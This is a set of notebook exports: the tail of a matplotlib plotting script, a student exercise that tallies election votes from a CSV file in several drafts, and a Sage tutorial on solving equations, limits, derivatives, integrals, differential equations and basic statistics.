nn.drawboxesT(ax[2],boxes,boxCol)
nn.drawboxesT(ax[3],boxes,boxCol)
for iax in ax:
iax.set_facecolor(mapCol)
ax[0].set_xlim(-13,ig1-ig0)
ax[1].set_xlim(0,ig1-ig0-.5)
ax[2].set_xlim(-13,ig1-ig0)
ax[3].set_xlim(-13,ig1-ig0)
ax[0].set_ylim(.5,jg1-jg0-.5)
ax[1].set_ylim(1,jg1-jg0)
ax[2].set_ylim(1,jg1-jg0)
ax[3].set_ylim(1,jg1-jg0)
nn.annotYTranspUpper(ax[0],boxes,NBoundC,SBoundC,NBoundMixC,SBoundMixC)
nn.annotXTranspUpper(ax[1],boxes,EBoundC,EBoundMixC)
nn.annotWTTranspUpper(ax[2],boxes,BBoundC)
nn.annotWMTranspUpper(ax[3],boxes,BBoundMixC)
x1=ax[1].get_position()
xc1=cbax[0].get_position()
cbax[0].set_position(mpl.transforms.Bbox.from_bounds(xc1.bounds[0],x1.bounds[1],.015,x1.bounds[3]))
x2=ax[3].get_position()
xc2=cbax[1].get_position()
cbax[1].set_position(mpl.transforms.Bbox.from_bounds(xc2.bounds[0],x2.bounds[1],.015,x2.bounds[3]))
fig.canvas.draw()
#fig.savefig('/data/eolson/results/MEOPAR/biomodelevalpaper/figsNNut/Ntransports0_k'+str(k)+'.png',dpi=300)
###Output
_____no_output_____ |
.ipynb_checkpoints/counting_election_votes_analysis-checkpoint.ipynb | ###Markdown
Counting Election Votes
###Code
# Import Dependencies
import os
import csv
# Set the File Path
filepath = os.path.join(".","resources","election_data_test.csv")
output_file = os.path.join(".", "votes.txt")
###Output
_____no_output_____
###Markdown
Draft 1
###Code
# Count all election votes in 2 loops
with open(filepath, newline='') as csvfile:
csvreader = csv.reader(csvfile, delimiter=',')
header = next(csvreader)
#print(header)
total_votes = []
for candidate_name in csvreader:
total_votes.append(candidate_name[2])
print(candidate_name[2])
votes_dict = {candidate:total_votes.count(candidate) for candidate in total_votes}
output = (
    f"Election Results\n"
    f"Total Votes: {len(total_votes)}\n"
    f"{votes_dict}\n"
    f"Khan: {votes_dict['Khan']/len(total_votes)*100}% ({votes_dict['Khan']})\n"
    f"Correy: {votes_dict['Correy']/len(total_votes)*100}% ({votes_dict['Correy']})\n"
    f"Li: {votes_dict['Li']/len(total_votes)*100}% ({votes_dict['Li']})\n"
)
print(output)
with open(output_file, 'w') as txt_file:
txt_file.write(output)
###Output
_____no_output_____
###Markdown
Draft 2
###Code
# Short List Test - DRAFT
import os
import csv
filepath2 = os.path.join(".","election_data_test.csv")
output_file = os.path.join(".", "votes_test2.txt")
with open(filepath2, newline='') as csvfile2:
csvreader2 = csv.reader(csvfile2, delimiter=',')
header2 = next(csvreader2)
#print(header2)
votes = []
for candidate_name in csvreader2:
votes.append(candidate_name[2])
#print(votes)
votes_dict = {candidate:votes.count(candidate) for candidate in votes}
#############################
# WRONG PLACEMENT #
#output = (print(votes_dict))
otooley = "O'Tooley"
print("Election Results")
print(f"Total Votes: {len(votes)}")
#print(votes_dict)
print(f"Khan: {round((votes_dict['Khan']/len(votes))*100, 2)}% ({votes_dict['Khan']}) ")
print(f"Correy: {round((votes_dict['Correy']/len(votes))*100, 2)}% ({votes_dict['Correy']}) ")
print(f"Li: {round((votes_dict['Li']/len(votes))*100, 2)}% ({votes_dict['Li']}) ")
print(f"O'Tooley: {round((votes_dict[otooley]/len(votes))*100, 2)}% ({votes_dict[otooley]})" )
########################################################
maximum_vote = 0
winner_name = []
for key, value in votes_dict.items():
if value > maximum_vote:
maximum_vote = value
winner_name.append(key)
#print(winner_name[0])
#print(maximum_vote)
print(f"Winner: {winner_name[0]}")
#with open(output_file, 'w') as txt_file:
# txt_file.write(output)
###Output
_____no_output_____
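###Markdown
A more compact way to pick the winner from the tally — a sketch that assumes the `votes_dict` built in the draft above is still in scope: `max()` with a key function returns the dictionary key with the largest vote count.
###Code
# Equivalent to the manual loop above: key=votes_dict.get compares candidates
# by their vote counts, and max() returns the name of the top candidate.
winner = max(votes_dict, key=votes_dict.get)
print(f"Winner: {winner} ({votes_dict[winner]} votes)")
###Output
_____no_output_____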
###Markdown
FINAL
###Code
# JG's ANSWER!!! - FINAL FINAL FINFAL
import os
import csv
#filepath2 = os.path.join(".","election_data.csv")
filepath2 = os.path.join(".","election_data_test.csv")
output_file = os.path.join(".", "pypoll_votes_final.txt")
with open(filepath2, newline='') as csvfile2:
csvreader2 = csv.reader(csvfile2, delimiter=',')
header2 = next(csvreader2)
#print(header2)
votes = []
for candidate_name in csvreader2:
votes.append(candidate_name[2])
#print(votes)
votes_dict = {candidate:votes.count(candidate) for candidate in votes}
print("Done running")
#output = (print(votes_dict))
maximum_vote = 0
winner_name = []
for key, value in votes_dict.items():
if value > maximum_vote:
maximum_vote = value
winner_name.append(key)
#print(winner_name[0])
#print(maximum_vote)
#print(f"Winner: {winner_name[0]}")
print(votes_dict)
otooley = "O'Tooley"
output = (
f"Election Results\n"
f"Total Votes: {len(votes)}\n"
f"Khan: {round((votes_dict['Khan']/len(votes))*100, 2)}% ({votes_dict['Khan']})\n"
f"Correy: {round((votes_dict['Correy']/len(votes))*100, 2)}% ({votes_dict['Correy']})\n"
f"Li: {round((votes_dict['Li']/len(votes))*100, 2)}% ({votes_dict['Li']})\n"
f"O'Tooley: {round((votes_dict[otooley]/len(votes))*100, 2)}% ({votes_dict[otooley]})\n"
f"Winner: {winner_name[0]}\n"
)
with open(output_file, 'w') as txt_file:
txt_file.write(output)
print("Execution Completed")
###Output
_____no_output_____
###Markdown
Answer 2: using 3 loops
###Code
import os
import csv
filepath = os.path.join('.', "election_data_test.csv")
with open(filepath, newline="") as csvfile3:
csvreader3 = csv.reader(csvfile3, delimiter=',')
# print to see each row
#for row in csvreader3:
#print(row)
header3 = next(csvreader3)
votes = []
# segregrate the votes into a seperate list
for vote in csvreader3:
votes.append(vote[2])
#print(votes)
vote_dict2 = {}
for candidate in votes:
if candidate not in vote_dict2:
vote_dict2[candidate] = 0
#vote_dict2[candidate] += 1
if candidate in vote_dict2:
vote_dict2[candidate] += 1
print(vote_dict2)
winner = ["", 0]
for key, value in vote_dict2.items():
#print(key, value)
if value > winner[1]:
winner[1] = value
winner[0] = key
print(winner)
324 + 114 + 56 + 10
###Output
_____no_output_____
###Markdown
Play Cell for teaching
###Code
# votes = []
# for candidate_name in csvreader2:
# votes.append(candidate_name[2])
import os
import csv
#filepath2 = os.path.join(".","election_data.csv")
filepath2 = os.path.join(".","election_data_test.csv")
output_file = os.path.join(".", "pypoll_votes_final.txt")
with open(filepath2, newline='') as csvfile2:
csvreader2 = csv.reader(csvfile2, delimiter=',')
header2 = next(csvreader2)
#print(header2)
votes2 = [candidate_name[2] for candidate_name in csvreader2]
print(votes2)
otooley = "O'Tooley"
print(otooley)
# Example pulled from Stackoverflow
# votes = ['apple','red','apple','red','red','pear']
# d = {candidate:votes.count(candidate) for candidate in votes}
# print(d)
# -*- coding: UTF-8 -*-
"""PyPoll Homework Solution."""
# Incorporated the csv module
import csv
import os
# Files to load and output (Remember to change these)
file_to_load = os.path.join("election_data.csv")
file_to_output = os.path.join("analysis", "election_analysis.txt")
# Total Vote Counter
total_votes = 0
# Candidate Options and Vote Counters
candidate_options = []
candidate_votes = {}
# Winning Candidate and Winning Count Tracker
winning_candidate = ""
winning_count = 0
# Read the csv and convert it into a list of dictionaries
with open(file_to_load) as election_data:
reader = csv.reader(election_data)
# Read the header
header = next(reader)
# For each row...
for row in reader:
# Run the loader animation
#print(". ", end=""),
# Add to the total vote count
total_votes = total_votes + 1
# Extract the candidate name from each row
candidate_name = row[2]
# If the candidate does not match any existing candidate...
# (In a way, our loop is "discovering" candidates as it goes)
if candidate_name not in candidate_options:
# Add it to the list of candidates in the running
candidate_options.append(candidate_name)
# And begin tracking that candidate's voter count
candidate_votes[candidate_name] = 0
# Then add a vote to that candidate's count
candidate_votes[candidate_name] = candidate_votes[candidate_name] + 1
# Print the results and export the data to our text file
with open(file_to_output, "w") as txt_file:
# Print the final vote count (to terminal)
election_results = (
f"\n\nElection Results\n"
f"-------------------------\n"
f"Total Votes: {total_votes}\n"
f"-------------------------\n")
print(election_results, end="")
# Save the final vote count to the text file
txt_file.write(election_results)
# Determine the winner by looping through the counts
for candidate in candidate_votes:
# Retrieve vote count and percentage
votes = candidate_votes.get(candidate)
vote_percentage = float(votes) / float(total_votes) * 100
# Determine winning vote count and candidate
if (votes > winning_count):
winning_count = votes
winning_candidate = candidate
# Print each candidate's voter count and percentage (to terminal)
voter_output = f"{candidate}: {vote_percentage:.3f}% ({votes})\n"
print(voter_output, end="")
# Save each candidate's voter count and percentage to text file
txt_file.write(voter_output)
# Print the winning candidate (to terminal)
winning_candidate_summary = (
f"-------------------------\n"
f"Winner: {winning_candidate}\n"
f"-------------------------\n")
print(winning_candidate_summary)
# Save the winning candidate's name to the text file
txt_file.write(winning_candidate_summary)
###Output
_____no_output_____ |
src/Lecture6/notebook/.ipynb_checkpoints/8-SageCalculus-modified-checkpoint.ipynb | ###Markdown
Symbolic expressions**Reference:** [[1](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.html)]Last time we saw the basics of symbolic expressions:* How to define and manipulate symbolic expressions* How to introduce new variables (in the Mathematical sense) with `var()`* How to solve equations and inequalities* Some of the Mathematical constants that are included in Sage, and how to approximate them using `n()`Here are some examples to remind you of these basic things:
###Code
var('y', 'z') # Define new variables (x is already defined by Sage)
f = x^2 + pi
g = y^2 + y - 2 > 0
print( solve(f==0, x) )
print( solve(z^2 - f, z) )
print( solve(g, y) )
print( 2*pi + e, "is approximately", n(2*pi + e) )
###Output
[
x == -sqrt(-pi),
x == sqrt(-pi)
]
[
z == -sqrt(pi + x^2),
z == sqrt(pi + x^2)
]
[[y < -2], [y > 1]]
2*pi + e is approximately 9.00146713563863
###Markdown
Now we will see some more details about solving equations and manipulating their solutions. Solving equations and inequalities**Reference** [[1](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.html)] for the details of `solve()` and `find_root()`, [[2](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/relation.htmlsolving)] for examples.Other than equations and inequalities, we can also solve systems: it is enough to give Sage a list of expressions and a list of variables with respect to which we want to solve. For example the system\begin{align*} \begin{cases} x + y = 2 \\ 2x - y = 6 \end{cases}\end{align*}Can be solved as
###Code
solve([x+y == 2, 2*x - y == 6], [x,y])
###Output
_____no_output_____
###Markdown
**Exercise.** Find the intersection of the circle of radius $2$ centered in the origin and the parabula of equation $y=x^2-2x+1$. **Solution:** the system is\begin{align*} \begin{cases} y^2 = x^2 - 2x +1\\ x^2 + y^2 = 4 \end{cases}\end{align*}
###Code
var('y')
eq1 = y^2 == x^2-2*x+1
eq2 = x^2 + y^2 == 4
solve([eq1, eq2], [x,y])
###Output
_____no_output_____
###Markdown
The set of solutionsOne would expect the result of `solve()` to be a list of solutions, but it is actually a list of expressions (technically it is not a list but a different type of Python collection, but this is not so important)
###Code
solutions = solve(x^2-9 == 0, x)
solutions[0] # This is the expression 'x == -3'
# Using rhs() explained below
print(solutions[0].rhs())
###Output
-3
###Markdown
To read the actual solution without the `x ==` part you can use the `rhs()` or `lhs()` functions, which can be applied to any expression containing a relation operator (like `==`, `=`...) and return the *right hand side* and *left hand side* of the expression, respectively
###Code
f = x^2+y <= 2-y
print("rhs:", f.rhs())
print("lhs:", f.lhs())
###Output
rhs: -y + 2
lhs: x^2 + y
###Markdown
When you solve an inequality or a system, the set of solutions can be more complicated to describe. In this case the result is a list containing lists of expressions that have to be `True` at the same time. It is easier to explain with an example:
###Code
print("Simple inequality:", solve(x^2-9 > 0, x))
print("System of inequalities:\n", solve([x^2-9 > 0, x < 6], x))
###Output
Simple inequality: [[x < -3], [x > 3]]
System of inequalities:
[
[3 < x, x < 6],
[x < -3]
]
###Markdown
In the last example (system of inequalities), Sage is telling us that the system\begin{align*} \begin{cases} x^2-9 > 9 \\ x < 6 \end{cases}\end{align*}has two solutions:* $x$ is between $3$ and $6$;* $x$ is less than $-3$.Since in Sage (and in Python) expressions can have at most on relational operator like `<`, the first solution requires two expressions to be described. Hence the "list of lists". **Exercise.** In the first exercise you were asked to solve a system of equations, but some of its solutions were complex numbers. Select only the real solutions and print them as pairs $(x,y)$.
###Code
# We use a different equation because the first exercise only
# had real solutions.
var('y')
eq1 = y^2 == x^2-2*x+5
eq2 = x^2 + y^2 == 4
solutions = solve([eq1, eq2], [x,y])
print("All solutions:")
print(solutions)
for s in solutions:
#print("One solutions is:", s)
x0 = s[0].rhs()
y0 = s[1].rhs()
if x0 in RR and y0 in RR:
print((x0, y0))
###Output
All solutions:
[
[x == (-1/2*I + 1/2), y == -sqrt(1/2*I + 4)],
[x == (-1/2*I + 1/2), y == sqrt(1/2*I + 4)],
[x == (1/2*I + 1/2), y == -sqrt(-1/2*I + 4)],
[x == (1/2*I + 1/2), y == sqrt(-1/2*I + 4)]
]
###Markdown
When solving a system of equations (not inequalities), you can use the option `solution_dict=True` to have the solutions arranged as a *dictionary*, which is a type of Python collection that we did not treat in this course
###Code
solve([x+y == 2, 2*x - y == 6], [x,y], solution_dict=True)
###Output
_____no_output_____
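###Markdown
Each entry of the returned list is a dictionary keyed by the variables, so individual values can be extracted directly. A quick illustration with the same system as above:
###Code
sols = solve([x+y == 2, 2*x - y == 6], [x,y], solution_dict=True)
print(sols[0][x], sols[0][y])  # the values of x and y in the first (and only) solution
###Output
_____no_output_____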
###Markdown
Alternative method for real roots: `find_root()`The `solve()` method is very useful when solving *symbolic* equations, for example when you have two variables and you want to solve for one of them in terms of the other. However, it does not always find explicit solutions.When you want to find an explicit, even if approximate, solution, it can be better to use `find_root()`. This function works *numerically*, which means that it finds an approximation of the root. It only works for real solutions and you need to specify an interval where you want the root to be searched:
###Code
f = e^x + x - 10
print("Using solve():\n", solve(f, x))
print("Using find_root():", f.find_root(0,10))
###Output
Using solve():
[
x == -e^x + 10
]
Using find_root(): 2.070579904980303
###Markdown
Evaluating functionsIf an expression contains only one variable you can evaluate it easily, even if it is not a function.
###Code
var('y')
f = x^2-3
g = x > x^2
print(f(2))
print(g(3+y))
###Output
1
y + 3 > (y + 3)^2
###Markdown
If an expression contains more than one variable, you can specify a value for each of them and they will be substituted in alphabetic order. You can also specify a value only for some of the variables.
###Code
var('y','z')
f = y*z^2 - y == z
print(f(2, 0))
print(f(z = 2))
###Output
-2 == 0
3*y == 2
###Markdown
Symbolic computationsSage can understand and simplify symbolic expressions such as sums (finite or infinite) and products. In the following cell, we compute the following sums using the [`sum()`](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.htmlsage.symbolic.expression.Expression.sum) function:\begin{align*} \begin{array}{llcc} (1) & \sum_{k=0}^nk &=&\frac{n^2+n}{2}\\ (2) & \sum_{k=0}^nk^4 &=&\frac{6n^5+15n^4+10n^3-n}{30}\\ (3) & \sum_{k=0}^n\binom nk &=& 2^n\\ (4) & \sum_{k=0}^\infty \frac1{k^2} &=& \frac{\pi^2}{6} \end{array}\end{align*}Recall that $\binom nk=\frac{n!}{k!(n-k)!}$
###Code
var('k', 'n') # Remember to declare all variables
s = []
s.append( sum(k, k, 0, n) )
s.append( sum(k^4, k, 0, n) )
s.append( sum(binomial(n,k), k, 0, n) )
s.append( sum(1/k^2, k, 1, infinity) )
for i in range(len(s)):
print("({}) {}".format(i+1, s[i]))
###Output
(1) 1/2*n^2 + 1/2*n
(2) 1/5*n^5 + 1/2*n^4 + 1/3*n^3 - 1/30*n
(3) 2^n
(4) 1/6*pi^2
###Markdown
An alternative notation is `expression.sum(k, a, b)`. There is an analogous [`prod()`](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.htmlsage.symbolic.expression.Expression.prod) for products.
###Code
(x^2).prod(x, 1, n)
###Output
_____no_output_____
###Markdown
Sometimes Sage tries to keep an expression in its original form without expanding out sums and products. To change this behavior you can use the [`expand()`](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.htmlsage.symbolic.expression.Expression.expand) function:
###Code
f = (x+1)^2 - (x-1)^2
print(f)
print(f.expand())
###Output
(x + 1)^2 - (x - 1)^2
4*x
###Markdown
The Symbolic Ring**Reference:** [[3](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/ring.html)]The symbolic expressions that we have seen so far live in a ring called *symbolic ring* and denoted by `SR` in Sage. This ring works like the ring `ZZ` of integers or `RR` of real numbers. In particular, you can define matrices and other objects using it as a "basis".
###Code
var('a', 'b', 'c', 'd')
M = matrix([[a,b], [c,d]])
print(M.determinant())
polring.<x> = SR[]
f = x^2 + 2*a*x + a^2
print(f.roots())
###Output
-b*c + a*d
[(-a, 2)]
###Markdown
**Exercise.** Compute the eigenvalues of the matrix\begin{align*}\begin{pmatrix}\cos \alpha & \sin \alpha\\-\sin\alpha & \cos \alpha\end{pmatrix}\end{align*}
###Code
var('a')
M = matrix([[cos(a), sin(a)], [-sin(a), cos(a)]])
M.eigenvalues()
lam = M.eigenvalues()[0]
print(lam(pi/2))
###Output
-I
###Markdown
Calculus**Reference:** [[4](https://doc.sagemath.org/html/en/reference/calculus/index.html)] for an overview, but most functions are described in [[1](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.html)] Limits and series**References:** [[5](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/calculus.htmlsage.calculus.calculus.limit)] for limits, [[6](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.htmlsage.symbolic.expression.Expression.series)] for seriesYou can compute limits
###Code
var('x')
f = sin(x)/x
#print(f(0)) # This one gives an error
print( f.limit(x=0) )
print( (e^(-x)).limit(x=-infinity) )
###Output
1
+Infinity
###Markdown
**Exercise.** Compute the constant $e$ using a limit.
###Code
expression = (1+x/n)^n
expression.limit(n=infinity)
###Output
_____no_output_____
###Markdown
You can also specify a direction for the limit. If you don't, Sage assumes that you want to take a two-sided limit.
###Code
f = abs(x)/x # 1 if x>0, -1 if x<0
print( f.limit(x=0) ) # undefined
print( f.limit(x=0, dir="+") )
print( f.limit(x=0, dir="-") )
plot(f)
f = 1/x^2
print( f.limit(x=0) )
print( f.limit(x=0, dir="+") )
print( f.limit(x=0, dir="-") )
plot(f, (x, -10, 10), ymax = 10, ymin = -10)
###Output
+Infinity
+Infinity
+Infinity
###Markdown
There is also the alternative notation `limit(f, x=a, dir=...)` which does the same as `f.limit(x=a, dir=...)`. You can also compute series expansions up to any order. **Watch out:** the `series()` notation uses `==` instead of the `=` that `limit()` uses.
###Code
f = e^x
g = sin(x) - 2*cos(x)
h = log(x)
#print(f.series(x==0, 5))
#print(g.series(x==0, 7))
print(h.series(x==1, 4))
print((sin(x)^2*cos(x)).series(x==0, 6))
###Output
1*(x - 1) + (-1/2)*(x - 1)^2 + 1/3*(x - 1)^3 + Order((x - 1)^4)
1*x^2 + (-5/6)*x^4 + Order(x^6)
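###Markdown
As a quick check of the functional notation mentioned above, the same kind of limits can be written with `limit(...)` instead of the method form (note the single `=` here, as opposed to the `==` used by `series()`):
###Code
print( limit(sin(x)/x, x=0) )
print( limit(abs(x)/x, x=0, dir='+') )
###Output
_____no_output_____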
###Markdown
Derivatives**References:** [[7](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.htmlsage.symbolic.expression.Expression.derivative)] and [[8](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/functional.htmlsage.calculus.functional.derivative)] for derivatives, [[9](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/functions.htmlsage.calculus.functions.jacobian)] for the Jacobian matrix and [[10](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.htmlsage.symbolic.expression.Expression.hessian)] for the Hessian. When computing derivatives, you need to specify with respect to which variables you want to derive, except in case there is only one.
###Code
var('y')
print( (x^2+2*y^4).derivative(y) ) # Alternative: derivative(f, y)
print( (2*x^3-x+2).derivative() )
###Output
8*y^3
6*x^2 - 1
###Markdown
You can also compute higher order derivatives:
###Code
print( (x^3).derivative(x, x) ) # Same as (x^3).derivative(x, 2)
f = x^7*y^2 + x^4*y^2 - 2*x^3 + x^2*y^5 + y + 2
print( f.derivative(x, x, y) ) # Twice in x, once in y
print( f.derivative(x, 4, y, 2) ) # 4 times in x, twice in y
###Output
6*x
84*x^5*y + 10*y^4 + 24*x^2*y
1680*x^3 + 48
###Markdown
Jacobian and Hessian matrices are also easy to compute:
###Code
f = (-x^2 + 2*x*y, y^3, x+y+x*y)
print( jacobian(f, [x,y]), "\n" )
g = x^2 + x*y + y^3 -2*x*y^2 -3
print( g.hessian() )
###Output
[-2*x + 2*y 2*x]
[ 0 3*y^2]
[ y + 1 x + 1]
[ 2 -4*y + 1]
[ -4*y + 1 -4*x + 6*y]
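###Markdown
As the note below points out, the method form also works once the function is declared with `vector(...)`; a quick sketch of that variant, using the same components as above:
###Code
fv = vector([-x^2 + 2*x*y, y^3, x+y+x*y])
print( fv.jacobian([x,y]) )
###Output
_____no_output_____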
###Markdown
*Note:* the notation `f.jacobian([x,y])` is also valid, but only if you specify that `f` is a vector by declaring it as `f = vector([...])`. Integrals**References:** [[11](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/integration/integral.html)] for symbolic integration and [[12](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/integration.html)] for numerical methods.You should remember from high school or from your first calculus/analysis course that derivatives are easy, but integrals are hard.When using computer software to solve your integrals, you have two choices:1. You can try to compute a primitive function exactly, and then (if you are computing a definite integral) substitute the endpoints of your integration interval to get the result. We can call this *symbolic integration*.2. You can get an *approximate* result with a *numerical method*. This method always gives some kind of result, but it cannot be used to compute indefinite integrals.Sage can do both of these things, although people who work in numerical analysis and often use the second method tend to prefer other programs, such as Matlab (or its open-source clone Octave). Symbolic integrationSymbolic integrals work more or less like derivatives. You must specify an integration variable, but the endpoints of the integration interval are optional. If they are not given you get an indefinite integral.
###Code
var('a', 'b')
f = x + sin(x)
print( f.integral(x) ) # Alternative: integral(f, x)
print( f.integral(x, -10, 10) )
print( f.integral(x, 0, pi) )
###Output
1/2*x^2 - cos(x)
0
1/2*pi^2 + 2
###Markdown
Your endpoints can also be $\pm\infty$:
###Code
print( integral(e^(-x), x, 0, infinity) )
print( integral(e^(-x^2), x, -infinity, infinity) )
###Output
1
sqrt(pi)
###Markdown
The last function is also an example of an integral that perhaps you might want to compute numerically. In fact:
###Code
print( integral(e^(-x^2), x) )
print( integral(e^(-x^2), x, 1, 2) )
###Output
1/2*sqrt(pi)*erf(x)
1/2*sqrt(pi)*erf(2) - 1/2*sqrt(pi)*erf(1)
###Markdown
Here `erf(x)` denotes the [error function](https://en.wikipedia.org/wiki/Error_function). Numerical integrationIn order to get an explicit value for the computations above, we can use a *numerical* method.The word "numerical" does not have much to do with numbers, but it refers to the fact that we are trying to compute explicit results rather than symbolic or algebraic ones. [Numerical analysis](https://en.wikipedia.org/wiki/Numerical_analysis) is the branch of mathematics that studies methods to approximate computations over the real or complex numbers. With these methods there is usually a trade-off between speed and precision.The Sage function [`numerical_integral()`](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/integration.htmlsage.calculus.integration.numerical_integral) takes as a parameter a real-valued one-variable function and the integration endpoints, and it returns both an approximate value for the integral and an error estimate.
###Code
numerical_integral(e^(-x^2), 1, 2)
###Output
_____no_output_____
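###Markdown
The returned pair can be unpacked directly when only one of the two numbers is needed — a quick illustration:
###Code
approx, error = numerical_integral(e^(-x^2), 1, 2)
print(approx)  # the approximate value of the integral
print(error)   # the estimated error bound
###Output
_____no_output_____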
###Markdown
The result above means, in symbols\begin{align*}\int_1^2 e^{-x^2}\mathrm dx = 0.13525725794999466 \pm 1.5016572202374808\times 10^{-15}\end{align*}There is also a [`monte_carlo_integral()`](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/integration.htmlsage.calculus.integration.monte_carlo_integral) method for functions with more than one variable. **Exercise.** Compute the area of the ellipse of equation $y^2+\left(\frac x3\right)^2=1$. **Solution:** First, rewrite the equation as:\begin{align*}y = \sqrt{1- \left(\frac{x}{3}\right)^2}\end{align*}This describes the upper half of the ellipse, so the total area is twice the integral of this function over $[-3,3]$.
###Code
y = sqrt(1-(x/3)^2)
show(plot(y, xmin=-3.1, xmax=3.1, ymin=-0.2, ymax=1.1))
integral(y, x, -3, 3)
###Output
_____no_output_____
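###Markdown
As promised above, here is a short sketch of the multi-variable numerical method. This is only an illustration and assumes your Sage version provides `monte_carlo_integral()` (it is documented on the same page as `numerical_integral()`); it integrates $xy$ over the square $[0,2]\times[0,2]$, whose exact value is $4$.
###Code
var('x', 'y')
# monte_carlo_integral(integrand, lower bounds, upper bounds, number of sample points)
# returns an (approximate value, error estimate) pair, like numerical_integral()
monte_carlo_integral(x*y, [0, 0], [2, 2], 10000)
###Output
_____no_output_____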
###Markdown
Differential equations**Reference:** [[13](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/desolvers.html)]A [differential equation](https://en.wikipedia.org/wiki/Differential_equation) is an equation involving an unknown function and its derivatives. They can be of two kinds: *ordinary* differential equations ([ODE](https://en.wikipedia.org/wiki/Ordinary_differential_equation)) and *partial* differential equations ([PDE](https://en.wikipedia.org/wiki/Partial_differential_equation)). The latter involve multivariate functions and their partial derivatives.Differential equations are in general hard to solve *exactly* (or *symbolically*): even a simple equation of the form $f'(x)=g(x)$, where $g(x)$ is some known function, requires solving the integral $\int g(x)\mathrm{d}x$ in order to find $f$, which as we know is not always easy!Theoretical results on differential equations usually ensure the existence and/or uniqueness of a solution under certain conditions, but in general they do not give a way to solve them. There exist many methods to find approximate solutions, and some of them are implemented in Sage as well (see [[13](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/desolvers.html)]). However, we will focus on the simple ODEs that can be solved exactly.Let's start with a simple example. Let's find all functions $f(x)$ such that $f'(x)=f(x)$. In order to do so, we need to use the `function()` construct, which allows us to define an "unknown" function inside Sage, like we define variables with `var()`.
###Code
var('x')
function('f')
equation = derivative(f(x)) == f(x)
desolve(equation, f(x)) # f(x) is the unknown function
###Output
_____no_output_____
###Markdown
As you can expect, they are all the functions $Ce^x$ for some constant $C$. The constant $C$ plays the same role as the constant in the solution of an integral, but in this case Sage writes it explicitly.We can also specify *initial conditions* for our function. For example we can impose that $f(0)=3$ as follows:
###Code
desolve(equation, f(x), (0,3))
###Output
_____no_output_____
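###Markdown
As a small sanity check (a sketch, assuming the cells above have been run), we can substitute the solution back into the equation and into the initial condition:
###Code
sol = desolve(equation, f(x), (0, 3))
print( bool(derivative(sol, x) == sol) ) # the solution satisfies f'(x) = f(x)
print( sol.subs(x=0) )                   # and the initial condition f(0) = 3
###Output
_____no_output_____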
###Markdown
You can also solve *second order* equations, that is, equations where the second derivative also appears. In this case, if you want to specify an initial condition, you should write the triple of values $(x_0, f(x_0), f'(x_0))$.
###Code
equation = derivative(f(x), x, 2) + x*derivative(f(x)) == 1
desolve(equation, f(x), (0, 0, 0))
###Output
_____no_output_____
###Markdown
**Exercise.** Use Sage to find out the functions $f(x)$ that satisfy\begin{align*} \begin{array}{rlcrl} (A) & \begin{cases} f(0) &= 1\\ f'(0) &= 0\\ f''(x) &= -f(x) \end{cases} & \qquad \qquad & (B) & \begin{cases} f(0) &= 0\\ f'(0) &= 1\\ f''(x) &= -f(x) \end{cases} \end{array}\end{align*}
###Code
eq = derivative(f(x), x, 2) == -f(x)
conditions1 = (0,1,0)
conditions2 = (0,0,1)
print( desolve(eq, f(x), conditions1) )
print( desolve(eq, f(x), conditions2) )
print( desolve(eq, f(x)) )
###Output
cos(x)
sin(x)
_K2*cos(x) + _K1*sin(x)
###Markdown
A real-world exampleDifferential equations have countless applications in Science, so it would be a shame not to see at least a simple one.Consider an object moving with constant acceleration $a$. Its velocity at time $t$ is described by the formula $v(t) = v(0) + at$. For example an object falling from the sky has acceleration $g\sim 9.8 m/s^2$ towards the ground, so its velocity is $v(t) = -gt$.However in the real world you need to take into account the air's resistance, which depends (among other things) on the velocity of the object. In this case the acceleration $a(t)$ is not constant anymore, and it satisfies an equation of the form $a(t)=-g -kv(t)$, where $k$ is some constant that may depend on the shape and mass of the object (in practice it may be more complicated than this).Since the acceleration is the derivative of the velocity, we have a differential equation\begin{align*} v'(t) = -g -kv(t)\end{align*}and we can try to solve it with Sage!
###Code
var('t')
function('v')
g = 9.8
k = 1.5
conditions = (0, 0) # Start with velocity 0
sol = desolve(derivative(v(t)) == -g -k*v(t), v(t), conditions)
#plot(sol, xmin=0, xmax = 100)
###Output
_____no_output_____
###Markdown
If you want to solve this equation symbolically (that is, keeping $g$ and $k$ in symbols) you need to specify that $t$ is the *independent variable* of the equation:
###Code
var('t', 'g', 'k')
function('v')
conditions = (0, 0) # Start with velocity 0
desolve(derivative(v(t)) == -g -k*v(t), v(t), conditions, ivar=t)
###Output
_____no_output_____
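###Markdown
A quick sanity check on the symbolic solution (a sketch, assuming the previous cell has been run): as $t\to\infty$ the drag term balances gravity, so the velocity should approach the terminal velocity $-g/k$. We tell Sage that $k$ is positive so that it can evaluate the limit.
###Code
assume(k > 0)
sol = desolve(derivative(v(t)) == -g -k*v(t), v(t), conditions, ivar=t)
limit(sol, t=oo)
###Output
_____no_output_____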
###Markdown
Basic data analysis and visualization Statistics**References:** [[14](https://doc.sagemath.org/html/en/reference/stats/sage/stats/basic_stats.html)]Sage includes the most basic functions for statistical analysis.
###Code
L = [1, 2, 3, 3, -6, -2, 4, -1, 0, 2, 3, -4, 0]
print("Values:\t", L)
print("Mean:\t\t\t", mean(L))
print("Median:\t\t\t", median(L))
print("Mode:\t\t\t", mode(L))
print("Standard deviation:\t", std(L))
print("Variance:\t\t", variance(L))
print("Moving average (5):", moving_average(L,5))
###Output
Values: [1, 2, 3, 3, -6, -2, 4, -1, 0, 2, 3, -4, 0]
Mean: 5/13
